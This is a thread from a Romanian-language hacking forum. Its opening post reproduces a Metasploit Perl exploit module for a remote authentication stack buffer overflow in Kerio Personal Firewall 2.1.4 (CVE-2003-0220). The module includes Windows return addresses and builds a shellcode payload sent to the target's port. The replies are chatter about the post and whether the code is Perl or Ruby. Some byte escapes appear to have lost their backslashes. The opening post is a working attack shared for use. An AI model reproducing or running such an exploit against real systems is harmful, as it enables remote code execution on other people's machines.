Hacking and more...
HaCkinG CulT
Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.
Nou pe simpatie:
Angelina20
Femeie
22 ani
Cluj
cauta Barbat
24 - 55 ani
Hacking and more... / Exploituri si POCs / Kerio Personal Firewall <= 2.1.4 Remote Authentication Packet Overflow Moderat de Shocker
Autor
Mesaj Pagini: 1
epic
User

Inregistrat: acum 18 ani
Postari: 1896


Code:

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::kerio_auth;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {

    'Name'  => 'Kerio Personal Firewall 2 (2.1.4) Remote Authentication Packet Buffer Overflow',
    'Version'  => '$Revision: 1.1 $',
    'Authors' => [ 'y0 [at] w00t-shell.net', ],
    'Arch'  => [ 'x86' ],
    'OS'    => [ 'win32', 'win2000', 'winxp', ],
    'Priv'  => 0,
    'UserOpts'  => {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 44334],
        'SSL'   => [0, 'BOOL', 'Use SSL'],
      },
    'AutoOpts' => { 'EXITFUNC' => 'process' },
    'Payload' => {
        'Space'     => 1000,
        'BadChars'  => "x00",
        'Prepend'   => "x81xc4x54xf2xffxff",
        'Keys'      => ['-ws2ord'],
      },

    'Description'  => Pex::Text::Freeform(qq{
    This module exploits a stack overflow in Kerio Personal Firewall 
administration authentication process. This module has only been tested 
against Kerio Personal Firewall 2 2.1.4.
}),

    'Refs'  =>  [
        ['BID', '7180'],
        ['CVE', '2003-0220'],
        ['URL', 'http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10'],
      ],

    'Targets' => [
        ['Windows 2000 Pro SP4 English', 0x7c2ec68b],
        ['Windows XP Pro SP0 English',   0x77e3171b],
        ['Windows XP Pro SP1 English',   0x77dc5527],
      ],

    'Keys' => ['firewall'],

    'DisclosureDate' => 'Apr 28 2003',

  };

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Exploit
{
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target = $self->Targets->[$target_idx];

    if (! $self->InitNops(128)) {
        $self->PrintLine("[*] Failed to initialize the nop module.");
        return;
    }

    my $sploit =
      Pex::Text::AlphaNumText(4268). $shellcode.
      pack('V', $target->[1]). "xe9x0bxfexffxff";

    $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));

    my $s = Msf::Socket::Tcp->new
      (
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
      );
    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return;
    }

    $s->Send($sploit);
    $self->Handler($s);
    $s->Close();
    return;
}

1;



_______________________________________
:< 4 8 15 16 23 42 *execute*
TOATA LUMEA ESTE INVITATA PE NOUL FORUM!

pus acum 18 ani
   
Child
Little Kevin

Din: UNndeva in OLT :D....
Inregistrat: acum 17 ani
Postari: 84
Hmmm  !!!  Frumos frumos ....

_______________________________________


pus acum 17 ani
   
tw8
Elite Member

Din: Drobeta Turnu Severin
Inregistrat: acum 17 ani
Postari: 1087
@Child: Sa mor io...toate posturile tale contin doar "thx" si "hmmmm".....

Modificat de tw8 (acum 17 ani)


_______________________________________



pus acum 17 ani
   
hfhun
Elite Member

Inregistrat: acum 18 ani
Postari: 593

tw8 a scris:

@Child: Sa mor io...toate posturile tale contin doar "thx" si "hmmmm".....

Si tu in toate posturile tale te iei de altii.


_______________________________________
"Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for." - The Mentor - The hacker's manifesto

pus acum 17 ani
   
Zero_Cool
Pe lista neagra

Inregistrat: acum 17 ani
Postari: 796
Correct hfhun

@epic :

Din cate stiu, exploitu asta e si in Metasploit sau e alt exploit.
P.S : Data viitoare sa scrii si tu in ce e facut


pus acum 17 ani
   
tw8
Elite Member

Din: Drobeta Turnu Severin
Inregistrat: acum 17 ani
Postari: 1087
Da.....asta vroiam sa intreb si io...in ce e facut?? cred ca notepad, no??

_______________________________________



pus acum 17 ani
   
k4hvd
Grand Master

Din: Oradea
Inregistrat: acum 17 ani
Postari: 322
cred ca e scris un ruby. si da, e luat din metasploit, scrie clar la inceput.

Modificat de k4hvd (acum 17 ani)


pus acum 17 ani
   
DarkTempo
Elite Member

Inregistrat: acum 18 ani
Postari: 556
nu e varianta ruby e varianta perl :P

_______________________________________
admin edit: poza mai mare de 300 x 100 pixeli

pus acum 17 ani
   
Pagini: 1  

Mergi la